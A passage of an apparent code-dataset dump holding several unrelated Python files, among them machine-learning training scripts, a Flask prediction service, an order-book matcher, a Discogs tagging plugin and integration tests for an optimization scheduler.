synth_config,\n 
metric_config,\n gen_strat1_config,\n soo_config,\n moo_config,\n pass_through_config,\n scripts_moo,\n scripts_synth_func,\n ]:\n serialized = object_to_json(\n config,\n encoder_registry=CORE_ENCODER_REGISTRY,\n class_encoder_registry=CORE_CLASS_ENCODER_REGISTRY,\n )\n\n c = object_from_json(\n serialized,\n decoder_registry=CORE_DECODER_REGISTRY,\n class_decoder_registry=CORE_CLASS_DECODER_REGISTRY,\n )\n assert config == c\n\n\ndef test_save_load_scheduler_branin(branin_main_run, tmp_path):\n file_out = tmp_path / \"scheduler.json\"\n scheduler = branin_main_run\n scheduler_to_json_file(scheduler, file_out)\n\n pre_num_trials = len(scheduler.experiment.trials)\n\n scheduler = scheduler_from_json_file(file_out)\n scheduler.run_n_trials(5)\n\n post_num_trials = len(scheduler.experiment.trials)\n\n # assert some trials run, even if we hit max trials and not all specified trials were run\n assert post_num_trials > pre_num_trials\n\n\ndef test_can_pass_custom_wrapper_path_when_loading_scheduler(branin_main_run, tmp_path):\n file_out = tmp_path / \"scheduler.json\"\n scheduler = branin_main_run\n\n orig_wrapper_path = scheduler.experiment.runner.wrapper._path\n scheduler.experiment.runner.wrapper._path = \"SOME/OTHER/PATH\"\n\n scheduler_to_json_file(scheduler, file_out)\n\n pre_num_trials = len(scheduler.experiment.trials)\n\n scheduler = scheduler_from_json_file(file_out, wrapper_path=orig_wrapper_path)\n scheduler.run_n_trials(5)\n\n post_num_trials = len(scheduler.experiment.trials)\n\n # assert some trials run, even if we hit max trials and not all specified trials were run\n assert post_num_trials > pre_num_trials\n\n\ndef test_can_pass_custom_wrapper_path_when_loading_scheduler_from_cli(stand_alone_opt_package_run, tmp_path_factory):\n scheduler = stand_alone_opt_package_run\n\n temp_dir = tmp_path_factory.mktemp(\"temp_dir\")\n file_out = temp_dir / \"scheduler.json\"\n\n orig_wrapper_path = scheduler.experiment.runner.wrapper._path\n scheduler.experiment.runner.wrapper._path = \"SOME/OTHER/PATH\"\n\n scheduler_to_json_file(scheduler, file_out)\n\n pre_num_trials = len(scheduler.experiment.trials)\n\n scheduler = dunder_main.main(\n split_shell_command(f\"--scheduler-path {file_out} --wrapper-path {orig_wrapper_path} -td\"),\n standalone_mode=False,\n )\n\n scheduler.run_n_trials(5)\n\n post_num_trials = len(scheduler.experiment.trials)\n\n # assert some trials run, even if we hit max trials and not all specified trials were run\n assert post_num_trials > pre_num_trials\n\n\ndef test_boa_version_in_scheduler(stand_alone_opt_package_run, tmp_path_factory):\n scheduler = stand_alone_opt_package_run\n\n temp_dir = tmp_path_factory.mktemp(\"temp_dir\")\n file_out = temp_dir / \"scheduler.json\"\n\n scheduler_to_json_file(scheduler, file_out)\n with open(file_out, \"r\") as f:\n scheduler_json = json.load(f)\n\n assert \"boa_version\" in scheduler_json\n assert scheduler_json[\"boa_version\"] == __version__\n\n\n@pytest.mark.skip(reason=\"Scheduler can't be saved with generic callable yet\")\ndef test_save_load_scheduler_with_generic_callable(metric_config, tmp_path):\n p = (ROOT / \"tests/scripts/stand_alone_opt_package\").resolve()\n sys.path.append(p)\n\n from tests.scripts.stand_alone_opt_package.wrapper import Wrapper\n\n with cd_and_cd_back(p):\n scheduler_json = tmp_path / \"scheduler.json\"\n config = metric_config\n opt_options = config[\"optimization_options\"]\n\n wrapper = Wrapper()\n wrapper.config = config\n wrapper.mk_experiment_dir(experiment_dir=tmp_path, 
append_timestamp=False)\n\n runner = WrappedJobRunner(wrapper=wrapper)\n search_space = instantiate_search_space_from_json(config.get(\"parameters\"), config.get(\"parameter_constraints\"))\n\n optimization_config = OptimizationConfig(Objective(ModularMetric(metric_to_eval=np.median), minimize=True))\n\n experiment = Experiment(\n search_space=search_space,\n optimization_config=optimization_config,\n runner=runner,\n **get_dictionary_from_callable(Experiment.__init__, opt_options[\"experiment\"]),\n )\n scheduler = get_scheduler(experiment=experiment, config=config)\n\n assert \"median\" in scheduler.experiment.metrics\n\n scheduler_to_json_file(scheduler, scheduler_json)\n\n scheduler = scheduler_from_json_file(scheduler_json, wrapper=wrapper)\n\n assert \"median\" in scheduler.experiment.metrics\n","sub_path":"tests/integration_tests/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":5727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48248035","text":"'''Contains functions to clean/pre-process the data'''\n\nimport numpy as np \nimport pandas as pd \n\n\nvariablesOfInterest = ['AGE','AJCC METASTASIS PATHOLOGIC PM','AJCC NODES PATHOLOGIC PN','AJCC PATHOLOGIC TUMOR STAGE','AJCC TUMOR PATHOLOGIC PT','ETHNICITY','GENDER','INITIAL WEIGHT','Mutation Count','DFS STATUS']\n\n\ndef convert_categorical_to_int(df, column_name):\n\t'''Convert categorical values into integers'''\t\n\n\tcategorical_values = df[column_name].value_counts().index.tolist()\n\tassigned_value = 0\n\tfor value in categorical_values:\n\t\tdf.loc[df[column_name] == value, column_name] = assigned_value\n\t\tassigned_value += 1\n\n\treturn df\n\ndef handle_categorical_variables(df, list_of_columns):\n\t'''Converts the categorical variables in the list of columns to integers'''\n\n\tfor column in list_of_columns:\n\t\tdf = convert_categorical_to_int(df, column)\n\n\treturn df\n\ndef handle_na(df):\n\t'''Handle the NaN fields'''\n\n\t# numeric columns are filled with the column mean, categorical columns with their most frequent value\n\tdf['AGE'].fillna(df['AGE'].mean(), inplace = True)\n\tdf['AJCC METASTASIS PATHOLOGIC PM'].fillna(df['AJCC METASTASIS PATHOLOGIC PM'].value_counts().index[0], inplace = True)\n\tdf['AJCC NODES PATHOLOGIC PN'].fillna(df['AJCC NODES PATHOLOGIC PN'].value_counts().index[0], inplace = True)\n\tdf['AJCC PATHOLOGIC TUMOR STAGE'].fillna(df['AJCC PATHOLOGIC TUMOR STAGE'].value_counts().index[0], inplace = True)\n\tdf['AJCC TUMOR PATHOLOGIC PT'].fillna(df['AJCC TUMOR PATHOLOGIC PT'].value_counts().index[0], inplace = True)\n\tdf['DFS STATUS'].fillna(df['DFS STATUS'].value_counts().index[0], inplace = True)\n\tdf['ETHNICITY'].fillna(df['ETHNICITY'].value_counts().index[0], inplace = True)\n\tdf['GENDER'].fillna(df['GENDER'].value_counts().index[0], inplace = True)\n\tdf['INITIAL WEIGHT'].fillna(df['INITIAL WEIGHT'].mean(), inplace = True)\n\tdf['Mutation Count'].fillna(df['Mutation Count'].mean(), inplace = True)\n\n\treturn df \n\ndef setup_target_variable(df, target_column, new_column, threshold):\n\t'''Changes the target variable values based on the threshold'''\n\n\tdf.loc[df[target_column].values > threshold, new_column] = 1\t\t# 1 - above the threshold\n\tdf.loc[df[target_column].values <= threshold, new_column] = 0\t\t# 0 - below the threshold\n\n\treturn df \n\n\n\n\n\n","sub_path":"Cancer/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"614630829","text":"'''\nEduard Larrañaga\nComputational Astrophysics 
\n2020\n\nGauss Elimination\n'''\ndef GaussElim(A,b):\n '''\n ------------------------------------------\n GaussElim(A,b)\n ------------------------------------------\n Returns the equivalent upper-triangular linear system\n obtained by Gauss elimination of the Linear System\n A x = b\n where\n A: nxn matrix\n b: n vector\n \n Arguments:\n A: numpy array of size nxn\n b: numpy array of size n\n ------------------------------------------\n '''\n n = len(b)\n # Check that the pivots are not zero\n for k in range(n):\n if(A[k,k]==0):\n print(f'Pivot A[{k+1:d}, {k+1:d}] is zero')\n return None, None\n \n # Main Loop of the Gauss Elimination\n for i in range(n-1):\n for j in range(i+1,n):\n C=A[j,i]/A[i,i]\n for k in range(n):\n A[j,k] = A[j,k] - A[i,k]*C\n b[j] = b[j] - C*b[i]\n return A, b","sub_path":"17. LSEs/GaussElimination.py","file_name":"GaussElimination.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444854739","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 14 18:28:51 2017\n\n@author: Dell\n\"\"\"\nimport numpy as np\n#import pandas as pd\nimport fcs_reader as fcsrd\nimport glob\n\n\nfname = glob.glob('F:\\\\cytowork\\\\experiment_44185_files\\\\*.fcs')[0:18*5]\nfor i in range(len(fname)):\n if i == 0:\n \n meta, data_numpy = fcsrd.parse_fcs(fname[i], meta_data_only=False, output_format='ndarray', reformat_meta=True)\n \n meta_data = meta['_channels_'] \n channel_names = (meta_data['$PnS'].values)\n selected_index = [] \n for name in channel_names:\n if \"CD\" in name:\n selected_index.insert(0,name) \n selected_index.insert(0,\"HLA-DR\")\n selected_index = np.array(selected_index)\n \n surface_marker = meta_data[meta_data['$PnS'].isin(selected_index)] \n surface_marker_data = data_numpy[:,surface_marker.index - 1]\n \n \n else:\n meta, data_numpy = fcsrd.parse_fcs(fname[i], meta_data_only=False, output_format='ndarray', reformat_meta=True) \n surface_marker_data = np.vstack((surface_marker_data,data_numpy[:,surface_marker.index - 1])) \n \n \n \n\n \nsuface_marker_data_transformed = np.arcsinh(surface_marker_data/5)\nquantile_995 = np.percentile(suface_marker_data_transformed,99.5,axis=0)\nsuface_marker_data_normalized = np.divide(suface_marker_data_transformed,np.tile(np.transpose(quantile_995),(np.shape(suface_marker_data_transformed)[0],1)))\n\nnp.save(\"normalizer.npy\",quantile_995)","sub_path":"cal_normalizer.py","file_name":"cal_normalizer.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"135094319","text":"#from django.conf.urls.defaults import *\nfrom django.conf.urls import patterns, include, url\nurlpatterns = patterns('message.views', \n# url(r'^delete/(?P<mess_id>\\d+)/+$', 'delete_mess', name = 'message.delete_mess'),\n url(r'^edit/(?P<mess_id>\\d+)/+$', 'edit_mess', name = 'message.edit_mess'),\n url(r'^newmess/(?P<src_name>\\w+)/(?P<src_id>\\d+)/+$', 'newmessage', name = 'message.newmessage'),\n url(r'^questions/$', 'questions', name = 'message.questions'),\n url(r'^newquest/$', 'newquest', name = 'message.newquest'),\n url(r'^response/(?P<mess_id>\\d+)/+$', 'response', name = 'message.response'),\n )","sub_path":"message/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"633733590","text":"\"\"\"Adds Discogs album search support to 
the\nautotagger. Requires the discogs-client library.\n\"\"\"\nimport string\n\nfrom time import strptime\n\nfrom beetsplug.abstract_search import AbstractSearchPlugin\nfrom beets.autotag import hooks\n\nimport discogs_client\nfrom discogs_client import Artist, Release, Search, DiscogsAPIError\n\ndiscogs_client.user_agent = 'curl/7.28.0'\n\n# Plugin structure and autotagging logic.\n\nclass DiscogsPlugin(AbstractSearchPlugin):\n def __init__(self):\n super(DiscogsPlugin, self).__init__()\n\n def _search(self, artist, album):\n super(DiscogsPlugin, self)._search(artist, album)\n try:\n albums = Search(artist + ' ' + album).results()[0:5]\n return filter(lambda album: isinstance(album, Release), albums)\n except DiscogsAPIError as e:\n if str(e).startswith('404'):\n return []\n else:\n raise e\n\n def _album_info(self, album):\n return hooks.AlbumInfo(\n album.title,\n None,\n self._artists_names(album.artists),\n None,\n map(self._track_info, album.tracklist)\n )\n\n def _track_info(self, track):\n disk_number, position = self._position(track['position'])\n\n return hooks.TrackInfo(\n track['title'],\n None,\n self._artists_names(track['artists']),\n None,\n self._duration(track['duration']),\n position,\n disk_number\n )\n\n def _artists_names(self, artists):\n filtered = filter(lambda artist: isinstance(artist, Artist), artists)\n names = map(lambda artist: artist.name, filtered)\n\n return ' and '.join(names)\n\n def _position(self, position):\n try:\n original = position\n \"\"\"Convert track position from u'1', u'2' or u'A', u'B' to 1, 2 etc\"\"\"\n position = position.encode('ascii').lower() # Convert from unicode to lovercase ascii\n\n if not len(position):\n return 0, 0\n\n first = position[0]\n\n if string.ascii_lowercase.find(first) != -1:\n number = ord(first) - 96\n\n if len(position) == 1:\n replace = '%i' % number # Letter is track number\n else:\n replace = '%i-' % number # Letter is vinyl side\n\n position = position.replace(first, replace)\n\n if position.find('-') == -1:\n position = '1-' + position # If no disk number, set to 1\n\n result = map(int, position.split('-'))\n\n if len(result) == 2:\n return result\n else:\n return 0, 0\n except ValueError:\n return 0, 0\n\n def _duration(self, duration):\n try:\n duration = strptime(duration.encode('ascii'), '%M:%S')\n except ValueError:\n return 0\n else:\n return duration.tm_min * 60 + duration.tm_sec","sub_path":"beetsplug/discogs.py","file_name":"discogs.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"154154221","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport tensorflow as tf\nimport itertools\nimport numpy as np\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\nfrom tensorflow.python.lib.io import file_io\nimport argparse\n\n# In[2]:\n\n\ndef generator(z, isTraining=True):\n with tf.variable_scope('generator'):\n \n gz1=tf.layers.conv2d_transpose(inputs=z,filters=64, kernel_size=[4,4], strides=(1,1), padding='valid')\n ga1= tf.nn.relu(tf.layers.batch_normalization(gz1, training=isTraining))\n gz2=tf.layers.conv2d_transpose(inputs=ga1,filters=64, kernel_size=[4,4], strides=(2,2), padding='same')\n ga2= tf.nn.relu(tf.layers.batch_normalization(gz2, training=isTraining))\n gz3=tf.layers.conv2d_transpose(inputs=ga2,filters=32, kernel_size=[4,4], strides=(2,2), padding='same')\n ga3= tf.nn.relu(tf.layers.batch_normalization(gz3, training=isTraining))\n 
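# two more stride-2 transposed convolutions upsample 16x16 -> 32x32 -> 64x64, and tanh maps the final image into [-1, 1]\n 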
gz4=tf.layers.conv2d_transpose(inputs=ga3,filters=32, kernel_size=[4,4], strides=(2,2), padding='same')\n ga4= tf.nn.relu(tf.layers.batch_normalization(gz4, training=isTraining))\n gz5=tf.layers.conv2d_transpose(inputs=ga4,filters=1, kernel_size=[4,4], strides=(2,2), padding='same')\n ga5=tf.nn.tanh(gz5)\n output= ga5\n return output\n\n\n# In[3]:\n\n\ndef discriminator(x, isTraining=True, reuse=False):\n with tf.variable_scope('discriminator', reuse=reuse):\n \n dz1=tf.layers.conv2d(inputs=x,filters=16, kernel_size=[4,4], strides=(2,2), padding='same')\n da1= tf.nn.leaky_relu(dz1,.2)\n dz2=tf.layers.conv2d(inputs=da1,filters=32, kernel_size=[4,4], strides=(2,2), padding='same')\n da2= tf.nn.leaky_relu(tf.layers.batch_normalization(dz2, training=isTraining),.2)\n dz3=tf.layers.conv2d(inputs=da2,filters=64, kernel_size=[4,4], strides=(2,2), padding='same')\n da3= tf.nn.leaky_relu(tf.layers.batch_normalization(dz3, training=isTraining),.2)\n dz4=tf.layers.conv2d(inputs=da3,filters=64, kernel_size=[4,4], strides=(2,2), padding='same')\n da4= tf.nn.leaky_relu(tf.layers.batch_normalization(dz4, training=isTraining),.2)\n dz5=tf.layers.conv2d(inputs=da4,filters=1, kernel_size=[4,4], strides=(1,1), padding='valid')\n da5=tf.nn.sigmoid(dz5)\n output=da5\n return output, dz5\n \n\n\n\n\n# In[5]:\ndef main(job_dir,**args):\n\n with tf.device('/device:GPU:0'):\n batch_size = 100\n lr = 0.0002\n epochs = 10\n mnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True, reshape=[])\n x = tf.placeholder(tf.float32, shape=(None, 64, 64, 1))\n z = tf.placeholder(tf.float32, shape=(None, 1, 1, 100))\n isTraining = tf.placeholder(dtype=tf.bool)\n G_z=generator(z, isTraining)\n realD, real_logits=discriminator(x,isTraining)\n fakeD, fake_logits=discriminator(G_z,isTraining, True)\n D_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=real_logits, labels=tf.ones([batch_size, 1, 1, 1])))\n D_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=fake_logits, labels=tf.zeros([batch_size, 1, 1, 1])))\n D_loss = D_loss_real + D_loss_fake\n G_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=fake_logits, labels=tf.ones([batch_size, 1, 1, 1])))\n\n #trainable params\n T_vars = tf.trainable_variables()\n D_vars = [var for var in T_vars if 'discriminator' in var.name]\n G_vars = [var for var in T_vars if 'generator' in var.name]\n #we get all vars and then update all functions like relu before calculating loss after each training\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n D_optim = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(D_loss, var_list=D_vars)\n G_optim = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(G_loss, var_list=G_vars)\n sess = tf.InteractiveSession(config=tf.ConfigProto(allow_soft_placement=True, \n log_device_placement=True))\n tf.global_variables_initializer().run()\n\n #summary_writer = tf.summary.FileWriter(logs_path, graph=tf.get_default_graph())\n train_set = tf.image.resize_images(mnist.train.images, [64, 64]).eval()\n train_set = (train_set - 0.5) / 0.5 #-1 to 1 normalize\n\n root = job_dir+'MNIST_DCGAN_results/'\n model = 'MNIST_DCGAN_'\n \n saver = tf.train.Saver()\n\n # In[7]:\n \n \n for epoch in range(epochs):\n G_losses = []\n D_losses = []\n #epoch_start_time = time.time()\n for iter in range(mnist.train.num_examples // batch_size):\n # update discriminator\n x_ = train_set[iter*batch_size:(iter+1)*batch_size]\n z_ = np.random.normal(0, 1, (batch_size, 1, 1, 100))\n\n loss_d_, _ = 
sess.run([D_loss, D_optim], {x: x_, z: z_, isTraining: True})\n D_losses.append(loss_d_)\n\n # update generator\n z_ = np.random.normal(0, 1, (batch_size, 1, 1, 100))\n loss_g_, _ = sess.run([G_loss, G_optim], {z: z_, x: x_, isTraining: True})\n G_losses.append(loss_g_)\n\n saver.save(sess, './modelDCGAN'+str(epoch)+'.ckpt')\n with file_io.FileIO('./modelDCGAN'+str(epoch)+'.ckpt.data-00000-of-00001', mode='rb') as input_f :\n with file_io.FileIO(job_dir+'modelDCGAN'+str(epoch)+'.ckpt.data-00000-of-00001', mode='w+') as output_f:\n output_f.write(input_f.read())\n with file_io.FileIO('./modelDCGAN'+str(epoch)+'.ckpt.index', mode='rb') as input_f :\n with file_io.FileIO(job_dir+'modelDCGAN'+str(epoch)+'.ckpt.index', mode='w+') as output_f:\n output_f.write(input_f.read())\n with file_io.FileIO('./modelDCGAN'+str(epoch)+'.ckpt.meta', mode='rb') as input_f :\n with file_io.FileIO(job_dir+'modelDCGAN'+str(epoch)+'.ckpt.meta', mode='w+') as output_f:\n output_f.write(input_f.read())\n if epoch==9 :\n fixedZ = np.random.normal(0, 1, (25, 1, 1, 100))\n test_images = sess.run(G_z, {z: fixedZ, isTraining: False})\n k=0\n for im in test_images:\n im=np.reshape(im, (64, 64))\n k=k+1\n \n fixed_p = './'+model + str(k) + str(epoch + 1) + '.png'\n plt.imsave(fixed_p, im, cmap='gray')\n with file_io.FileIO(fixed_p, mode='rb') as input_f :\n with file_io.FileIO(job_dir+'result/imgepoch'+ str(epoch+1)+str(k)+ '.png' , mode='w+') as output_f:\n output_f.write(input_f.read())\n \n sess.close()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n # Input Arguments\n parser.add_argument(\n '--job-dir',\n help='GCS location to write checkpoints and export models',\n required=True\n )\n args = parser.parse_args()\n arguments = args.__dict__\n\n main(**arguments)\n","sub_path":"trainer/DCGAN.py","file_name":"DCGAN.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341426836","text":"import flask\nfrom flask import request\nimport tensorflow as tf\nimport keras\nfrom keras.models import load_model\nfrom keras.preprocessing.text import Tokenizer\n\napp = flask.Flask(__name__)\n\ndef auc(y_true, y_pred):\n auc = tf.metrics.auc(y_true, y_pred)[1]\n keras.backend.get_session().run(tf.local_variables_initializer())\n return auc\n\n# load the model, and pass in the custom metric function\nglobal graph\ngraph = tf.get_default_graph()\nmodel = load_model('natgeo.h5', custom_objects={'auc': auc})\n\n\n# define a predict function as an endpoint \n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n data = {\"success\": False}\n # get the request parameters\n \n req_data = request.get_json()\n text = req_data['text']\n #print(text)\n tokenizer = Tokenizer(num_words=45000)\n tokenizer.fit_on_texts([text])\n x = tokenizer.texts_to_matrix([text], mode='tfidf')\n #print(x.shape)\n #print(x)\n with graph.as_default():\n y = model.predict(x)\n #print(y.shape)\n if (y[0][0] < 0.70):\n data[\"prediction\"] = \"release\"\n \n else:\n data[\"prediction\"] = \"contract\"\n data[\"success\"] = True\n data[\"confidence\"] = str(y[0][0])\n\n # return a response in json format \n return flask.jsonify(data) \n# start the flask app, allow remote connections\napp.run(host='0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"231118200","text":"#\n# Copyright (c) 2018 
Klemen Forstnerič\n#\n\nimport heapq\nimport time\nfrom orders import SellOrder, BuyOrder, ProcessedOrder, Snapshot\nfrom threading import Lock\n\n\nclass OrderBook:\n\n def __init__(self, user_storage):\n self._user_storage = user_storage\n\n self._lock = Lock()\n self._sell_orders = []\n self._buy_orders = []\n self._processed_orders = []\n\n def __get_price_for_one(self, sell_order, buy_order):\n # Which price we use depends on the timestamp of the orders.\n\n if sell_order.timestamp < buy_order.timestamp:\n return buy_order.price_for_one\n\n if sell_order.timestamp > buy_order.timestamp:\n return sell_order.price_for_one\n\n # In case both orders come at the same time, we average the bid and ask\n # price, to be fair to both users. :-)\n return (buy_order.price_for_one + sell_order.price_for_one) / 2\n\n def __get_current_timestamp(self):\n return time.time()\n\n def __process_sell_order_is_bigger(self, sell_order, buy_order):\n amount = buy_order.amount\n\n price_for_one = self.__get_price_for_one(sell_order, buy_order)\n bid_price_for_one = buy_order.price_for_one\n\n sell_order.amount -= amount\n sell_order.price = sell_order.price_for_one * sell_order.amount\n\n heapq.heappop(self._buy_orders)\n\n return ProcessedOrder(sell_order.seller_id, buy_order.buyer_id, amount,\n price_for_one, bid_price_for_one,\n self.__get_current_timestamp())\n\n def __process_buy_order_is_bigger(self, sell_order, buy_order):\n amount = sell_order.amount\n\n price_for_one = self.__get_price_for_one(sell_order, buy_order)\n bid_price_for_one = buy_order.price_for_one\n\n buy_order.amount -= amount\n buy_order.price = buy_order.price_for_one * buy_order.amount\n\n heapq.heappop(self._sell_orders)\n\n return ProcessedOrder(sell_order.seller_id, buy_order.buyer_id, amount,\n price_for_one, bid_price_for_one,\n self.__get_current_timestamp())\n\n def __process_orders_same_size(self, sell_order, buy_order):\n amount = sell_order.amount\n\n price_for_one = self.__get_price_for_one(sell_order, buy_order)\n bid_price_for_one = buy_order.price_for_one\n\n heapq.heappop(self._buy_orders)\n heapq.heappop(self._sell_orders)\n\n return ProcessedOrder(sell_order.seller_id, buy_order.buyer_id, amount,\n price_for_one, bid_price_for_one,\n self.__get_current_timestamp())\n\n def __update_users(self, processed_orders):\n for processed_order in processed_orders:\n seller_id = processed_order.seller_id\n buyer_id = processed_order.buyer_id\n\n seller_lock = self._user_storage.get_lock_for_user(seller_id)\n buyer_lock = self._user_storage.get_lock_for_user(buyer_id)\n\n # hold both users' locks while transferring balances\n with seller_lock, buyer_lock:\n seller = self._user_storage.get_user(seller_id)\n buyer = self._user_storage.get_user(buyer_id)\n\n amount = processed_order.amount\n price_for_one = processed_order.price_for_one\n bid_price_for_one = processed_order.bid_price_for_one\n\n price = price_for_one * amount\n bid_price = bid_price_for_one * amount\n\n seller.balance_usd += price\n buyer.balance_btc += amount\n\n # In case the buyer got this for a lower price, we put back some of\n # the money.\n buyer.balance_usd += (bid_price - price)\n\n def __process_orders(self):\n processed_orders = []\n\n while self._sell_orders and self._buy_orders:\n sell_order = self._sell_orders[0]\n buy_order = self._buy_orders[0]\n\n # Can we even match anything?\n if sell_order.price_for_one > buy_order.price_for_one:\n break\n\n processed_order = None\n\n if sell_order.amount > buy_order.amount:\n processed_order = self.__process_sell_order_is_bigger(\n sell_order, buy_order)\n 
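# the buy order is the larger side here, so the sell order is filled completely\n 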
elif sell_order.amount < buy_order.amount:\n processed_order = self.__process_buy_order_is_bigger(\n sell_order, buy_order)\n else:\n processed_order = self.__process_orders_same_size(sell_order, buy_order)\n\n processed_orders.append(processed_order)\n\n self._processed_orders.extend(processed_orders)\n return processed_orders\n\n def add_sell_order(self, seller_id, amount, price):\n sell_order = SellOrder(seller_id, amount, price,\n self.__get_current_timestamp())\n\n # We keep sell orders in a min-heap.\n with self._lock:\n heapq.heappush(self._sell_orders, sell_order)\n\n def add_buy_order(self, buyer_id, amount, price):\n buy_order = BuyOrder(buyer_id, amount, price,\n self.__get_current_timestamp())\n\n # We keep buy orders in a max-heap.\n with self._lock:\n heapq.heappush(self._buy_orders, buy_order)\n\n def process_orders(self):\n processed_orders = None\n\n with self._lock:\n processed_orders = self.__process_orders()\n\n self.__update_users(processed_orders)\n\n def get_snapshot(self):\n with self._lock:\n return Snapshot(self._sell_orders, self._buy_orders,\n self._processed_orders)\n","sub_path":"order_book.py","file_name":"order_book.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"285181240","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 8 14:37:57 2020\n\n@author: Jérémie\n\"\"\"\nimport sys\n\ndef plot_flight(df,identification,datedebut,datefin):\n \"\"\"plot and save figure of the given flight (identification) among the flights of the dataset (df)\"\"\"\n\n # saving file and returning PATH\n PATH = \"E:/eDocuments/\\\"projet intégrateur\\\"/plot_radar_microservice\"\n PATH += \"/plots/\"+identification.replace(\" \",\"-\")+\"_\"+datedebut+\"_\"+datefin+\".png\" \n print(\"file:///\"+PATH.replace(\" \", \"%20\").replace(\"é\", \"%C3%A9\").replace(\"\\\"\", \"\").replace(\"\\\\\",\"\"))\n\n\n\n\n\ndef main(argv):\n \"\"\"plot radar and return path of the image\"\"\"\n \n # Deal with args\n if len(sys.argv) == 5:\n radar, datedebut, identification = sys.argv[1], sys.argv[2],str(sys.argv[3])+\" \"+str(sys.argv[4])\n datefin = datedebut\n elif len(sys.argv) == 6:\n radar, datedebut, datefin, identification = sys.argv[1], sys.argv[2], sys.argv[3], str(sys.argv[4])+\" \"+str(sys.argv[5])\n else:\n print('usage: python plotRadar.py @radar JJ-MM-YYYY JJ-MM-YYYY AI AA\\nusage: python plotRadar.py @radar JJ-MM-YYYY AI AA\\nexample: python plotRadar.py 01:00:5e:50:00:26 12-12-2020 TRA39U 4841AA')\n sys.exit(12)\n #datedebut, datefin, identification= \"12-12-2020\", \"12-12-2020\", \"TRA39U 4841AA\"#\"FPO6610 39666F\"VS\"JAF7FE 44A835\" #\"VLG8191 343194\"(landed)#\"TAR724 02A194\"#\"AFR1390 3991E1\" #\"AAF525 398005\"\n \n # Plot radar\n plot_flight(\"\",identification,datedebut,datefin)\n\n return 0\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n\n\n\n","sub_path":"scripts/plotRadar2.py","file_name":"plotRadar2.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"88384526","text":"import sys\nimport ast\nimport astunparse\n\n\ndef give_hint():\n \"\"\"Print the expected input format\"\"\"\n print('Format:', file=sys.stderr)\n print('out-module-descriptions-file out-module-metadata-file '\n 'out-class-declarations-file out-class-descriptions-file out-class-metadata-file', file=sys.stderr)\n print('in-files-list', file=sys.stderr)\n sys.exit(-1)\n\n\ndef get_pretty_docstring(doc_str):\n 
\"\"\"Tidy up a docstring\"\"\"\n doc_str = doc_str.replace(\"DCQT\", \"DCQTDCQT\").replace(\"DCNL\", \"DCQTDCNL\")\n doc_str = doc_str.replace(\"'\", \"\\\\'\")\n rv_list = []\n for line in doc_str.split('\\n'):\n line = line.strip()\n # skip this line if it is empty or contains no alphanumeric characters\n if line == \"\" or (not any([c.isalnum() for c in line])):\n continue\n rv_list.append(line)\n unevaluated_pretty_docstring = \"'\" + \" DCNL \".join(rv_list) + \"'\"\n return unevaluated_pretty_docstring\n\n\ndef escape_control_string(line):\n \"\"\"Escape the control tokens\"\"\"\n return line.replace(\"DCQT\", \"DCQTDCQT\").replace(\"DCNL\", \"DCQTDCNL\")\n\n\ndef process_class(node, out_class_decl_fd, out_class_desc_fd, out_class_meta_fd, input_filename,\n parent_class_lineno=-1):\n doc_str = ast.get_docstring(node)\n # convert the AST back to a str\n # after the split the first 2 elements are '', so indexing starts at 2\n unparsed_list = astunparse.unparse(node).split('\\n')\n # get the number of decorators\n n_classdef_decorator = len(node.decorator_list)\n unparsed_classdef = unparsed_list[2: 3 + n_classdef_decorator]\n pretty_docstring = get_pretty_docstring(doc_str) if doc_str is not None else \"DCNA\"\n classdef = \" DCNL \".join([escape_control_string(line) for line in unparsed_classdef])\n meta_str = input_filename + \" \" + str(node.lineno) + \" \" + str(parent_class_lineno)\n print(pretty_docstring, file=out_class_desc_fd)\n print(classdef, file=out_class_decl_fd)\n print(meta_str, file=out_class_meta_fd)\n for inner_node in node.body:\n if isinstance(inner_node, ast.ClassDef):\n process_class(inner_node, out_class_decl_fd, out_class_desc_fd, out_class_meta_fd, input_filename,\n node.lineno)\n\n\ndef process_module(in_fd, out_module_desc_fd, out_module_meta_fd, out_class_decl_fd, out_class_desc_fd,\n out_class_meta_fd, input_filename):\n\n module_str = in_fd.read()\n module_ast = 